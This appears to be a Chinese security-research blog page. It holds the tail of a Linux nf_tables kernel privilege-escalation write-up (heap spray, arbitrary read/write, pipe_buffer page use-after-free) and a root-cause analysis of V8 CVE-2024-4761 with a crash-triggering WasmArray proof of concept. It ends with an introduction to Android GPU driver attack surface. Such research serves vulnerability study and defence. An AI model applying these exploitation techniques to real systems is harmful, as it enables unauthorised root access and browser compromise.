堆喷包含越界读的nft_object，通过越界读构造两组连续的nft_object，因为这一步只涉及越界读，不会破坏指针，因此可以不断重试，直到构造完成为止。

Step.2

释放obj1，喷射stags_table A，释放obj4，喷射tags_table B，此时堆分布如下：

Step.3

释放obj3，在堆喷nft_obj触发越界写，使其仅覆盖下一个堆块开头的8字节，将 tags_table B的table[0]指向tags_table A。

Step.4

此时就可以通过控制tags_table B的table[0]向tags_table A的table[0]写入任意地址，最后再用tags_table A的table[0]向该地址写入任意值。

任意地址读

由于一个nft_obj2的地址也是已知的，注意到nft_object中存在udlen和udata两个字段，前者控制长度，后者控制地址，在nf_tables_getobj可以将udata指针指向的数据dump出来。

因此可以通过任意地址写将udata改为要读的地址，udlen改为要读取的长度（调试发现最好改为0xC00以下，否则可能会因为超过sk_buff的长度导致读取失败），从而完成任意地址读。

具体在内存中的表现如下图所示：

有了任意读写之后，然后搜 cred 改uid 就可以拿到root权限了。

3.3 Root by pipe_buffer

由于 pipe_buffer 结构体也是从 GFP_KERNEL_ACCOUNT 缓存中分配，因此第二种方式尝试通过该结构体实现提权。

Step.1

在这一步中同时释放nft_obj1 和nft_obj2，然后堆喷pipe_buffer进行堆占位，又因为前面已经泄露了nft_obj的地址，自然而然也知道了pipe_buffer的地址，为方便后续说明，将这里堆喷的pipe_buffer 称作 pipe_set_A，简单来说就是看做一个集合A，这个集合里面的pipe会被用来后面构造page uaf。

Step.2

之后通过不断重复分配两个nft_obj，利用越界写其中一个nft_obj的udlen和udata字段，让指针指向pipe_buffer结构体从而可以泄露出page指针。

Step.3

在泄露出 page 之后，利用方式就变得比较多了，这里通过越界写构造一个 Page UAF，构建自写管道，实现任意物理地址读写，由于堆块分配的随机性，所以在这个过程中需要堆喷 pipe_buffer，同时去触发越界写，在检测是否成功溢出到 page 指针。在这个过程中堆喷的pipe_buffer称作pipe_set_B，完成该过程之后的堆内存分布图参考如下：

上图即为第一次构造page uaf时的场景，这里稍微提几点需要注意的地方，首先，不管是哪个集合，这些spray_pipe 不要求是连续的，也不要求在同一个slab之内，我们 leak 出的 page 字段也不一定是 spray_pipe[0]的，只需要确定在 pipe_set_A 和 pipe_set_B中存在两个page指向的是同一个页面即可，正常来说在这一步之继续堆喷 pipe_buffer 占用释放的 page 就可以实现任意读写了，但是在实机测试过程中发现成功命中该page的概率较小，导致利用成功率较低。

针对上述这种情况出现的问题，这里采用的思路是多次触发page uaf去增大page命中的概率，由于pipe_buffer结构体可能虽然在内存中是不连续的，但是需要注意的是，分配的struct page结构体却大概率是连续的，struct page结构体大小为0x40，在不开随机化的时候默认从VMEMMAP_BASE 0xffffea0000000000开始（对应x86-64架构）存放struct page结构体。具体原理参考下图：

事实证明，在漏洞利用过程中采用了上述思路之后，命中效果有较大幅提升，而且理论上来说，这种尝试次数可以叠加，从而对应的命中成功率也会上升，当然由于这个过程中也会增加越界写触发的次数可能导致内核崩溃的概率增加，但是这里由于只需要溢出page字段，因而控制每次溢出长度为 4 byte 即可，在实际利用过程中，因为越界写而导致的内核crash的概率很低。

Step.4

最后效果如上图所示，至此就可以通过修改 UAF page 中的 pipe_buffer 来实现任意地址读写。

四、实机演示

在 vedio 目录分别保存有两种利用方式最终实现的提权效果。

References

无法摆脱的追踪

2025-05-28T03:53:20.000Z

当人们谈论“手机隐私”时，往往默认指的是是否授权摄像头、麦克风、定位。但在实际的移动互联网生态中，真正决定一个用户是否“可被识别”的，不是这些高敏感权限，而是藏于设备系统、网络协议、以及广告SDK背后的那些身份锚点。
Android系统看似不断提升隐私防护能力，从 Android 8 到 Android 15，多次更新都在强调限制非必要的设备信息访问、收紧权限申请流程，但依然未能解决一个核心问题：“即使你不登录、不授权、不使用账户，系统依然知道你是谁。”

全文

城堡的小门：v8类型混淆漏洞CVE-2024-4761分析

2025-03-04T10:18:56.000Z

‍

1. 前言

在讲述漏洞之前, 让我们设想这样一个场景: 你有一座设有严密防御的城堡，城墙高大坚固，把敌人挡在外面。你的城堡有唯一的入口，那就是一个重门深锁、有严格守卫检查的大门。然后，为了增加便利性，你决定在城堡的另一侧增加一个小门，方便城堡内的人快速出入。然而，你在增加这个新功能后，忘记了对这个小门进行同样严格的防御和检查。这就相当于在你的城堡的防线上留下了一个大漏洞。敌人可以绕过主门的严格检查，通过这个没有守卫的小门轻易进入城堡。

本次要讲述的漏洞CVE-2024-4761就是城堡的小门: 随着v8中wasm模块的蓬勃发展, 添加了许多新类型的对象, 这些新类型对于旧有的代码提出了源源不断的挑战, 导致旧有代码遗漏了某些检查.

本文着重于漏洞分析, 尝试从patch开始一步步构建出POC.

根据官方修复patch: https://chromium-review.googlesource.com/c/v8/v8/+/5527397, 我们可以得知: 该漏洞在f320600cd1f48ba6bb57c0395823fe0c5e5ec52e这个commit中被修复, parent commit为66c0bd3237b1577e6291de56003f8fddc6b65b16, 因此后续的源码分析都是基于parent commit进行的.

‍

2. 背景知识

在进入漏洞分析之前, 我们首先需要了解一下相关函数

‍

2.1 如何触发`SetOrCopyDataProperties()`

漏洞被认为是一个类型混淆, 位于SetOrCopyDataProperties()方法中, 因此首先研究如何触发该函数

// 该函数用于读取source拥有的所有可枚举属性, 并且把他们添加到target中
// 使用Set还是CreateDataProperty依赖于use_set参数.
// 属于excluded_properties中的值不会被复制
V8_WARN_UNUSED_RESULT static Maybe<bool> SetOrCopyDataProperties(
    Isolate* isolate, Handle target, Handle source,
    PropertiesEnumerationMode mode,
    const base::ScopedVector* excluded_properties = nullptr,
    bool use_set = true);

这个函数没有直接暴露给js态使用, 而是先被封装为Runtime方法

RUNTIME_FUNCTION(Runtime_SetDataProperties) {
  HandleScope scope(isolate);
  DCHECK_EQ(2, args.length());
  Handle target = args.at(0);
  Handle source = args.at(1);

  // 2. If source is undefined or null, let keys be an empty List.
  if (IsUndefined(*source, isolate) || IsNull(*source, isolate)) {
    return ReadOnlyRoots(isolate).undefined_value();
  }

  MAYBE_RETURN(JSReceiver::SetOrCopyDataProperties(
                   isolate, target, source,
                   PropertiesEnumerationMode::kEnumerationOrder),
               ReadOnlyRoots(isolate).exception());
  return ReadOnlyRoots(isolate).undefined_value();
}

RUNTIME_FUNCTION(Runtime_CopyDataProperties) {
  HandleScope scope(isolate);
  DCHECK_EQ(2, args.length());
  Handle target = args.at(0);
  Handle source = args.at(1);

  // 2. If source is undefined or null, let keys be an empty List.
  if (IsUndefined(*source, isolate) || IsNull(*source, isolate)) {
    return ReadOnlyRoots(isolate).undefined_value();
  }

  MAYBE_RETURN(
      JSReceiver::SetOrCopyDataProperties(
          isolate, target, source,
          PropertiesEnumerationMode::kPropertyAdditionOrder, nullptr, false),
      ReadOnlyRoots(isolate).exception());
  return ReadOnlyRoots(isolate).undefined_value();

Runtime方法用于涉及到对象属性复制的slow path, 比如TF定义的builtinSetDataProperties就会在GotoIfForceSlowPath()或者fast path无法进行时时跳转到Runtime::kSetDataProperties, 进入slow path的条件

!(IsEmptyFixedArray(source_elements) && !IsEmptySlowElementDictionary(source_elements): source的elements不是空数组并且也不是空的dictionary, 那么就进入runtime
IsJSReceiverInstanceType(source_instance_type): 如果是JSReceiver的衍生对象, 但不是JSObject, 那么就进入slow path处理
IsDeprecatedMap(target_map): target的map被弃用, 此时写入target会触发target map更新, fast path无法处理
EnsureOnlyHasSimpleProperties(source_map, type, bailout)
IsJSReceiverInstanceType(source_instance_type)

TF_BUILTIN(SetDataProperties, SetOrCopyDataPropertiesAssembler) {
  auto target = Parameter(Descriptor::kTarget);
  auto source = Parameter(Descriptor::kSource);
  auto context = Parameter(Descriptor::kContext);

  Label if_runtime(this, Label::kDeferred);
  // 强制进入slow path
  GotoIfForceSlowPath(&if_runtime);   
  // 尝试fast path
  SetOrCopyDataProperties(context, target, source, &if_runtime, base::nullopt,
                          base::nullopt, true);
  Return(UndefinedConstant());

  BIND(&if_runtime);
  TailCallRuntime(Runtime::kSetDataProperties, context, target, source);
}

一个比较简单的触发SetOrCopyDataProperties的方式就是通过Object.assign()

Object.assign()调用Builtin::kSetDataProperties
Builtin::kSetDataProperties尝试fast path失败后进入Runtime::kSetDataProperties
Runtime::kSetDataProperties调用到CPP方法SetOrCopyDataProperties()中

// ES #sec-object.assign
TF_BUILTIN(ObjectAssign, ObjectBuiltinsAssembler) {
  TNode argc = ChangeInt32ToIntPtr(
      UncheckedParameter(Descriptor::kJSActualArgumentsCount));
  CodeStubArguments args(this, argc);

  auto context = Parameter(Descriptor::kContext);
  TNode target = args.GetOptionalArgumentValue(0);

  // 被写入的对象
  TNode to = ToObject_Inline(context, target);

  Label done(this);
  // 只有一个参数, 直接返回
  GotoIf(UintPtrLessThanOrEqual(args.GetLengthWithoutReceiver(),
                                IntPtrConstant(1)),
         &done);

  // 遍历assign()后续所有的参数, 对于每一个参数都调用Builtin::kSetDataProperties
  args.ForEach(
      [=](TNode next_source) {
        CallBuiltin(Builtin::kSetDataProperties, context, to, next_source);
      },
      IntPtrConstant(1));
  Goto(&done);

  // 5. Return to.
  BIND(&done);
  args.PopAndReturn(to);
}

触发slow path进入SetOrCopyDataProperties()的例子如下

// job(from)->elements非空, 进入`SetOrCopyDataProperties()`
let from = {};
from[0]=0;

let target = {};
Object.assign(target, from);
%SystemBreak();

‍

2.2 `SetOrCopyDataProperties()`的作用

下面分析一下SetOrCopyDataProperties()的具体行为, 研究下具体是那部分出错了

// static
Maybe<bool> JSReceiver::SetOrCopyDataProperties(
    Isolate* isolate, Handle target, Handle source,
    PropertiesEnumerationMode mode,
    const base::ScopedVector* excluded_properties,
    bool use_set) {

  // 首先尝试cpp部分的fast赋值
  Maybe<bool> fast_assign =
      FastAssign(isolate, target, source, mode, excluded_properties, use_set);
  if (fast_assign.IsNothing()) return Nothing<bool>();
  if (fast_assign.FromJust()) return Just(true);

  // 获取要遍历属性的对象
  Handle from = Object::ToObject(isolate, source).ToHandleChecked();

  // 获取from中所有属性的key(相当于elements和properties一起处理了)
  Handle keys;
  ASSIGN_RETURN_ON_EXCEPTION_VALUE(
      isolate, keys,
      KeyAccumulator::GetKeys(isolate, from, KeyCollectionMode::kOwnOnly,
                              ALL_PROPERTIES, GetKeysConversion::kKeepNumbers),
      Nothing<bool>());

  // 如果from没有fast properties, 但是target有fast properties, 并且target不是global proxy对象
  if (!from->HasFastProperties() && target->HasFastProperties() &&
      !IsJSGlobalProxy(*target)) {

    int source_length;    // source中属性的个数
    if (IsJSGlobalObject(*from)) {    // from是全局对象
      source_length = JSGlobalObject::cast(*from)
                          ->global_dictionary(kAcquireLoad)
                          ->NumberOfEnumerableProperties();
    } else if constexpr (V8_ENABLE_SWISS_NAME_DICTIONARY_BOOL) {
      source_length =
          from->property_dictionary_swiss()->NumberOfEnumerableProperties();
    } else {    // from中是字典属性, 计算属性个数
      source_length =
          from->property_dictionary()->NumberOfEnumerableProperties();
    }

    // 如果source中属性个数超过了kMaxNumberOfDescriptors的限制
    // 那么就把target中的fast properties都转换为dictionary properties
    // 期望可以容纳source_length个元素, 因为后续也要把这部分添加进来
    if (source_length > kMaxNumberOfDescriptors) {
      JSObject::NormalizeProperties(isolate, Handle::cast(target),
                                    CLEAR_INOBJECT_PROPERTIES, source_length,
                                    "Copying data properties");
    }
  }

  // 遍历所有的属性
  for (int i = 0; i < keys->length(); ++i) {
    // 获取第i个属性的key对象 (属性的key也是一个js对象)
    Handle next_key(keys->get(i), isolate);
    if (excluded_properties != nullptr &&
        HasExcludedProperty(excluded_properties, next_key)) {
      continue;
    }

    // 4a i. Let desc be ? from.[[GetOwnProperty]](nextKey).
    // 获取该key的属性描述符
    PropertyDescriptor desc;
    Maybe<bool> found =
        JSReceiver::GetOwnPropertyDescriptor(isolate, from, next_key, &desc);
    if (found.IsNothing()) return Nothing<bool>();
    // 4a ii. If desc is not undefined and desc.[[Enumerable]] is true, then
    // 改属性为可枚举属性
    if (found.FromJust() && desc.enumerable()) {
      // 获取该属性的value对象
      Handle prop_value;
      ASSIGN_RETURN_ON_EXCEPTION_VALUE(
          isolate, prop_value,
          Runtime::GetObjectProperty(isolate, from, next_key), Nothing<bool>());

      // 把属性写入target中
      if (use_set) {
        // 4c ii 2. Let status be ? Set(to, nextKey, propValue, true).
        Handle status;
        ASSIGN_RETURN_ON_EXCEPTION_VALUE(
            isolate, status,
            Runtime::SetObjectProperty(isolate, target, next_key, prop_value,
                                       StoreOrigin::kMaybeKeyed,
                                       Just(ShouldThrow::kThrowOnError)),
            Nothing<bool>());
      } else {
        // 4a ii 2. Perform ! CreateDataProperty(target, nextKey, propValue).
        PropertyKey key(isolate, next_key);
        CHECK(JSReceiver::CreateDataProperty(isolate, target, key, prop_value,
                                             Just(kThrowOnError))
                  .FromJust());
      }
    }
  }

  return Just(true);
}

总结一下操作逻辑

首先调用FastAssign()尝试fast path处理, 失败后进入后续部分
调用KeyAccumulator::GetKeys(from)获取from中的所有属性, 这里就elements和properties一起处理了
清理fast properties: 如果from没有fast properties, 但是target有fast properties, 那么就会调用NormalizeProperties(target)把target中的fast properties转换为字典实现
后续遍历from中所有的属性, 写入target中

FastAssign()的退出条件如下

V8_WARN_UNUSED_RESULT Maybe<bool> FastAssign(
    Isolate* isolate, Handle target, Handle source,
    PropertiesEnumerationMode mode,
    const base::ScopedVector* excluded_properties,
    bool use_set) {

  // 非空字符串被认为是non-JSReceiver, 需要在Object.assign()中显示处理
  if (!IsJSReceiver(*source)) {
    return Just(!IsString(*source) || String::cast(*source)->length() == 0);
  }
  ...

  Handle map(JSReceiver::cast(*source)->map(), isolate);

  // fast path只能处理source为JSObject的情况
  if (!IsJSObjectMap(*map)) return Just(false);
  // fast path只能处理source为simple properties的情况(非dictionary properties)
  if (!map->OnlyHasSimpleProperties()) return Just(false);

  // 只能处理source的elements为empty fixed array的情况
  Handle from = Handle::cast(source);
  if (from->elements() != ReadOnlyRoots(isolate).empty_fixed_array()) {
    return Just(false);
  }

  // 至此: 只需要遍历from的properties array
  Handle descriptors(map->instance_descriptors(isolate),
                                      isolate);

    ...
  }
  UNREACHABLE();
}
}  // namespace

因此只要from的elements不是fixed empty array的, 那么FastAssign()就会退出

‍

3. 漏洞根因

根据漏洞修复的diff:

diff --git a/src/objects/js-objects.cc b/src/objects/js-objects.cc
index c3f5d31..13b787f 100644
--- a/src/objects/js-objects.cc
+++ b/src/objects/js-objects.cc
@@ -434,9 +434,7 @@
       Nothing());
 
   if (!from->HasFastProperties() && target->HasFastProperties() &&
-      !IsJSGlobalProxy(*target)) {
-    // JSProxy is always in slow-mode.
-    DCHECK(!IsJSProxy(*target));
+      IsJSObject(*target) && !IsJSGlobalProxy(*target)) {
     // Convert to slow properties if we're guaranteed to overflow the number of
     // descriptors.
     int source_length;

‍

问题出现在调用NormalizeProperties(target)的逻辑上, 调用JSObject::NormalizeProperties()前额外限制了target必须是JSObject

在打上这个Patch之前: 调用NormalizeProperties()时会执行Handle::cast(target)把target强制转换为JSObject类型
但是根据参数声明: Handle target只能保证target是JSReceiver
因此Handle::cast(target) 这个强制类型转换是不安全的

Maybe<bool> JSReceiver::SetOrCopyDataProperties(
    Isolate* isolate, 
    Handle target,     // <===
    Handle source,
    PropertiesEnumerationMode mode,
    const base::ScopedVector* excluded_properties,
    bool use_set) {
  ...
  // 如果from没有fast properties, 但是target有fast properties, 并且target不是global proxy对象
  if (!from->HasFastProperties() && target->HasFastProperties() &&
      !IsJSGlobalProxy(*target)) {

    int source_length;    // source中属性的个数
    ...

    // 如果source中属性个数超过了kMaxNumberOfDescriptors的限制
    // 那么就把target中的fast properties都转换为dictionary properties
    // 期望可以容纳source_length个元素, 因为后续也要把这部分添加进来
    if (source_length > kMaxNumberOfDescriptors) {
      JSObject::NormalizeProperties(isolate, Handle::cast(target),
                                    CLEAR_INOBJECT_PROPERTIES, source_length,
                                    "Copying data properties");
    }
  }
  ...
}

JSReceiver与JSObject的区别如下, JSReceiver比JSObject少了一个elements字段

extern class JSReceiver extends HeapObject {
  properties_or_hash: SwissNameDictionary|FixedArrayBase|PropertyArray|Smi;
}

extern class JSObject extends JSReceiver {
  elements: FixedArrayBase;

因此: 当target是JSReceive的子类型, 但又不是JSObject类型时, 就会触发漏洞

根据out.gn/CVE-2024-4761/gen/torque-generated/instance-types.h中的类继承关系, 满足条件的只有JS_PROXY_TYPE, WASM_ARRAY_TYPE, WASM_STRUCT_TYPE三种类型.

  V(FIRST_JS_RECEIVER_TYPE, 290) \
    V(FIRST_WASM_OBJECT_TYPE, 290) \
      V(WASM_ARRAY_TYPE, 290) /* https://source.chromium.org/chromium/chromium/src/+/main:v8/src/wasm/wasm-objects.tq?l=252&c=1 */\
      V(WASM_STRUCT_TYPE, 291) /* https://source.chromium.org/chromium/chromium/src/+/main:v8/src/wasm/wasm-objects.tq?l=249&c=1 */\
    V(LAST_WASM_OBJECT_TYPE, 291) \
    V(JS_PROXY_TYPE, 292) /* https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-proxy.tq?l=5&c=1 */\
    V(FIRST_JS_OBJECT_TYPE, 293) \
      ... // JSObject的子类
    V(LAST_JS_OBJECT_TYPE, 2165) \
  V(LAST_JS_RECEIVER_TYPE, 2165) \
V(LAST_HEAP_OBJECT_TYPE, 2165) \

看得出之前在编写SetOrCopyDataProperties() 的代码时只考虑到了JS_PROXY_TYPE的情况, 所以进行了过滤, 但是后面添加WASM_ARRAY_TYPE, WASM_STRUCT_TYPE时没有考虑到SetOrCopyDataProperties() , 由此导致了漏洞

‍

4. 构造POC

4.1 创建`WasmArray`对象

那么如何构造出一个WasmArray对象? 研究发现v8发现没有直接提供JS API来创建这个对象, 而且由于WASM GC是一个比较新的提案, 因此wat2wasm这个工具目前也不支持array.new这种语法, 因此只能通过wasm-module-builder构造:

const prefix = "../../";

d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);

let builder = new WasmModuleBuilder();

// 添加一个WasmArray类型, 元素类型为I32, 可变
let array = builder.addArray(kWasmI32, true);

builder.addFunction(    // 添加名字为createArray的wasm函数
        'createArray', 
        makeSig([kWasmI32], [kWasmExternRef])    // 函数签名: [kWasmI32]=>[kWasmExternRef]
    ).addBody([    // 生成函数体
            kExprLocalGet, 0,    // 栈上push局部变量0, 也就是函数kWasmI32类型的参数
            kGCPrefix, kExprArrayNewDefault, array,    // 创建array类型的数组, 元素为i32的默认值
            kGCPrefix, kExprExternConvertAny,    // 把wasm的值包装为Extern类型
    ]).exportFunc();    // 导出这个函数

let instance = builder.instantiate({});    // 构建wasm实例
let wasm = instance.exports;    // 获取导入的函数
let array42 = wasm.createArray(42);    // 42为wasm array的长度
%DebugPrint(array42);

构造出WasmArray对象后就要想办法进入JSObject::NormalizeProperties(isolate, Handle::cast(target)

‍

4.2 进入`SetOrCopyDataProperties()`

对于Object.assign(...)

1 2	let from = {}; Object.assign(array42, from);

Object.assign()调用Builtin::kSetDataProperties 处理, 但是fast path: SetOrCopyDataProperties()就可以直接完成

TF_BUILTIN(SetDataProperties, SetOrCopyDataPropertiesAssembler) {
  auto target = Parameter<JSReceiver>(Descriptor::kTarget);
  auto source = Parameter<Object>(Descriptor::kSource);
  auto context = Parameter<Context>(Descriptor::kContext);

  Label if_runtime(this, Label::kDeferred);
  // 强制进入slow path
  GotoIfForceSlowPath(&if_runtime);   
  // 尝试fast path
  SetOrCopyDataProperties(context, target, source, &if_runtime, base::nullopt,
                          base::nullopt, true);
  Return(UndefinedConstant());

  BIND(&if_runtime);
  TailCallRuntime(Runtime::kSetDataProperties, context, target, source);
}

为了不进入SetOrCopyDataProperties(), 只需要让job(from)->elements非空这样就可以进入SetOrCopyDataProperties()

// job(from)->elements非空, 进入CPP方法JSReceiver::SetOrCopyDataProperties()处理
let from = {};
from[0]=0;
Object.assign(array42, from);

‍

4.3 触发`NormalizeProperties()`

进入SetOrCopyDataProperties()

只要from的elements非空, FastAssign()就无法处理, 进入slow path部分
首先要满足!from->HasFastProperties() && target->HasFastProperties()
1. target->HasFastProperties()恒成立, WasmArray::properties为kEmptyFixedArray
2. 想要满足!from->HasFastProperties(), 只需要让from的properties通过字典实现即可
source_length > kMaxNumberOfDescriptors: 需要让from中properties超过kMaxNumberOfDescriptors个, 也就是1020个, 那么就可以成功进入NormalizeProperties(..., target)

Maybe JSReceiver::SetOrCopyDataProperties(
    Isolate* isolate, 
    Handle<JSReceiver> target,     // <===
    Handle<Object> source,
    PropertiesEnumerationMode mode,
    const base::ScopedVector<Handle<Object>>* excluded_properties,
    bool use_set) {
  // [1] 只要from的elements非空, FastAssign()就无法处理
  Maybe fast_assign =
      FastAssign(isolate, target, source, mode, excluded_properties, use_set);
  if (fast_assign.IsNothing()) return Nothing();
  if (fast_assign.FromJust()) return Just(true);

  ...
  // 如果from没有fast properties, 但是target有fast properties, 并且target不是global proxy对象
  if (!from->HasFastProperties() && target->HasFastProperties() &&
      !IsJSGlobalProxy(*target)) {

    int source_length;    // source中属性的个数
    ...

    // 如果source中属性个数超过了kMaxNumberOfDescriptors的限制
    // 那么就把target中的fast properties都转换为dictionary properties
    // 期望可以容纳source_length个元素, 因为后续也要把这部分添加进来
    if (source_length > kMaxNumberOfDescriptors) {
      JSObject::NormalizeProperties(isolate, Handle<JSObject>::cast(target),
                                    CLEAR_INOBJECT_PROPERTIES, source_length,
                                    "Copying data properties");
    }
  }
  ...
}

因此这部分poc如下

// job(from)->elements非空, 进入CPP方法JSReceiver::SetOrCopyDataProperties()处理
let from = {};
from[0]=0;

// 添加properties, 使得job(from)->properties通过字典实现, 让!from->HasFastProperties()成立
// properties个数超过1020, 让source_length > kMaxNumberOfDescriptors成立
// 最终触发JSObject::NormalizeProperties(..., Handle::cast(target), ...)
for(let i=0; i<1021; i++) {
    from['p'+i] = i;
}

Object.assign(array42, from);

‍

4.4 完整POC

最终下面这样的POC即可触发crash

const prefix = "../../";

d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);

let builder = new WasmModuleBuilder();
let array = builder.addArray(kWasmI32, true);

builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef]))
    .addBody([
        kExprLocalGet, 0,
        kGCPrefix, kExprArrayNewDefault, array,
        kGCPrefix, kExprExternConvertAny,
    ]).exportFunc();

let instance = builder.instantiate({});
let wasm = instance.exports;
let array42 = wasm.createArray(42);
%DebugPrint(array42);

// job(from)->elements非空, 进入CPP方法JSReceiver::SetOrCopyDataProperties()处理
let from = {};
from[0]=0;

// 添加properties, 使得job(from)->properties通过字典实现, 让!from->HasFastProperties()成立
// properties个数超过1020, 让source_length > kMaxNumberOfDescriptors成立
// 最终触发JSObject::NormalizeProperties(..., Handle::cast(target), ...)
for(let i=0; i<1021; i++) {
    from['p'+i] = i;
}

Object.assign(array42, from);
%SystemBreak();

crash如下

#
# Fatal error in ../../src/objects/map-inl.h, line 344
# Debug check failed: IsJSObjectMap(*this).
#
#

‍

5. 总结

这个漏洞的根因在于支持WasmGC之后添加了新的对象类型, 导致与属性访问部分的老代码漏判.

实际上随着wasm模块的发展, 随之而来的漏洞源源不断. 对于漏洞挖掘工作提供了重要的启发: 一定关注新代码, 因为新的代码往往是最容易被攻击的部分. 他们在开发过程中必须格外留意，确保旧有的代码能够安全地处理新的代码。在我们的"城堡"上打开新的一扇"小门"时，我们必须谨记，绝不能忘记对这扇新开的"小门"进行严格的安全检查。

‍

6. Reference

安卓GPU漏洞攻防介绍

2025-01-23T08:29:55.000Z

背景

GPU是终端设备负责图形化渲染的硬件，和CPU相比，它能更高效地并行计算。传统的PC端GPU可以通过PCIe接口在主板上热插拔，而在移动端，GPU往往和CPU集成在一块芯片上，再搭配负责网络通信的基带等配件，统一称为SoC。目前移动端市场占有率比较高的SoC有高通的骁龙系列处理器、联发科天玑系列处理器、华为海思处理器等。这些SoC的CPU部分都有统一规范的arm指令集，这保证了一套程序只需编译一次，在不同厂商的CPU上都能正确运行。但是这些厂商的GPU指令集却非常封闭，甚至有些没有公开的文档，每家厂商在自己的标准上发展了自己的生态，试图构建商业护城河。作为开发者如果需要根据每个硬件厂商定制不同的GPU操作逻辑，想必是一件非常复杂的事情，而事实上的安卓开发者，大多数情况下并不需要接和GPU进行交互，我们在绘制一个窗口、展示一张图片时，是通过调用安卓系统封装的统一接口实现。那安卓又是如何保证这么多硬件兼容性的呢？

上面的兼容性问题其实不止出现在移动端，在PC端也普遍存在。为了保证各种GPU硬件的兼容性，业界制定了统一的OpenGL、Vulkan、DirectX等标准，这些标准约定了名称规范统一的API调用约定。各家SoC厂商如果想推广自己的硬件，就必须自己负责开发基于这些标准实现的系统驱动、软件链接库。以OpenGL标准为例，如果要绘制一个窗口，开发者需要编写下面这样的代码。至于glfwInit、glfwCreateWindow、glfwMakeContextCurrent、glewInit这些函数，是由硬件厂商负责编写成链接库，在系统里供我们动态链接。这些链接库函数会和GPU内核驱动交互，而GPU驱动控制硬件，处理用户的逻辑。

int main() {
    // 初始化 GLFW
    if (!glfwInit()) {
        std::cerr << "Failed to initialize GLFW" << std::endl;
        return -1;
    }

    GLFWwindow* window = glfwCreateWindow(800, 600, "OpenGL Rectangle", nullptr, nullptr);
    if (!window) {
        std::cerr << "Failed to create GLFW window" << std::endl;
        glfwTerminate();
        return -1;
    }
    glfwMakeContextCurrent(window);

    // 初始化 GLEW
    if (glewInit() != GLEW_OK) {
        std::cerr << "Failed to initialize GLEW" << std::endl;
        return -1;
    }
    ...
}

安卓操作系统约定，硬件厂商的SoC在出厂时同时需要提供软件支持，必须满足至少OpenGL以及Vulkan（安卓7以后支持）两种调用约定。厂商负责编写的代码有两个部分，内核层的GPU驱动以及用户态的GPU 链接库。这种代码模块分离的思想在其他硬件如音频驱动、摄像头上也有类似的使用，被安卓统一定义为硬件抽象层（Hardware Abstraction Layer），又称HAL。

安卓只需要在HAL层声明需要哪些接口，明确定义好动态链接库导出的函数名称，传参方式，具体实现都交给了厂商。由于硬件厂商众多，他们编写的代码安全性必定不能和主线代码相比。与之矛盾的是，为了和硬件交互，厂商编写的代码往往都直接运行在内核态，一旦驱动代码出现安全问题，整个系统的安全建设将付之一炬，可谓安卓安全生态中最短的一块木板。

当然安卓研发人员也意识到这种问题的严重性，使用SELinux约束了这些硬件接口的调用权限。比如普通app没有权限直接使用摄像头、麦克风等硬件，必须通过系统的service进行数据中转，极大减少了驱动暴露出的攻击面。在service中转前，又使用AOSP的权限管控约束了APP的行为。

然而，GPU硬件出于性能的考虑，没办法使用service进行中转，任意一个APP默认就有权限和GPU驱动进行交互，在SELinux上也没有相应的进行权限管控。这也导致了GPU成为安卓安全生态中最为脆弱的一环，在过去一两年的安卓在野漏洞利用中，攻击者无一例外地瞄准了GPU驱动，借助GPU的驱动漏洞实现从普通APP到root的权限提升。

认识GPU

在利用GPU漏洞进行系统提权之前，我们有必要理清楚GPU的正常交互逻辑，开发者是如何操作GPU进行图形绘制、并行计算呢？

Shader编程

在CPU计算领域，我们通常使用一些高级编程语言进行程序编写，交给编译器将我们的程序编译成CPU能理解的机器码运行。和CPU流程类似，GPU领域也有专用的编程语言，称为shader，它是控制图形硬件进行图像渲染或单元计算的程序。如下所示，是一个简单的并行计算数组绝对值的shader代码。

#version 430

layout(std430, binding = 0) buffer InputBuffer {
    float inputData[];
};

layout(std430, binding = 1) buffer OutputBuffer {
    float outputData[];
};

void main() {
    uint index = gl_GlobalInvocationID.x;
    outputData[index] = abs(inputData[index]);
}

当然GPU硬件肯定没办法理解上述语言是什么意义，从上面的语言到GPU硬件指令还需要额外的中间语言编译、硬件语言翻译两个阶段。

我们使用glslang编译工具链将shader代码编译为SPIR-V格式的字节码，这是由业界提出的一种计算机图形学统一的中间语言。OpenGL、VulKan等标准提供了接口来加载并运行SPIR-V字节码，在运行时，OpenGL这些框架会动态地将字节码翻译为GPU能直接理解的指令码进行执行。

1	$ glslangValidator -V shader_abs.comp -o shader_abs.spv

至此我们简单理解了GPU的交互过程，这对GPU驱动漏洞挖掘还不够，我们需要从更底层的视角去发现问题。像上面的shader代码，程序的输入输出是float数组，但对于硬件来说这些都是内存里的比特，程序的运行必定涉及到GPU、CPU的内存数据交换、共享，这些又是怎么处理的呢？

GPU内存模型

传统的CPU在使用内存时，提出了虚拟内存的思想。基于硬件控制，不同的进程内存空间相互独立，称为虚拟内存，每个进程的虚拟内存和实际的物理内存之间的映射关系由页表保存。GPU在内存管理方便和CPU有着非常相似的地方。每个GPU程序上下文运行在相互独立的虚拟内存空间，GPU内核驱动负责维护每个GPU上下文的页表，管理程序内存申请、释放、和CPU的共享内存逻辑。

以高通GPU驱动为例，用户态的程序可以通过ioctl和GPU驱动交互，和GPU共享内存。

// 打开GPU驱动，创建一个gpu程序上下文
int gslfd = open("/dev/kgsl-3d0",0);
// 申请一块内存
void *buffer = (void *)mmap((void *)0x40000000L, 0x1000L, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS|MAP_FIXED, -1, 0);
if (buffer == MAP_FAILED)
{
    printf("mmap error:%d\n",errno);
    return 0;
}
printf("mmap buffer return %p\n", buffer);
// 配置GPU共享内存参数
struct kgsl_map_user_mem args = {
    .flags = KGSL_MEMFLAGS_USE_CPU_MAP | KGSL_MEMFLAGS_USERMEM_ADDR | (KGSL_CACHEMODE_UNCACHED << KGSL_CACHEMODE_SHIFT) ,
    .memtype = KGSL_USER_MEM_TYPE_ADDR,
    .hostptr = (uint64_t)buffer,
    .offset = 0,
    .len = 0x1000L,
};
ret = ioctl(gslfd, IOCTL_KGSL_MAP_USER_MEM, &args);
if (ret)
{
    printf("ioctl IOCTL_KGSL_MAP_USER_MEM cmd_data error: %d %s\n",errno,strerror(errno));
    return 0;
}

继续查看高通GPU内核驱动的代码，可以看到驱动里大量复杂的ioctl交互逻辑，处理用户态的请求。

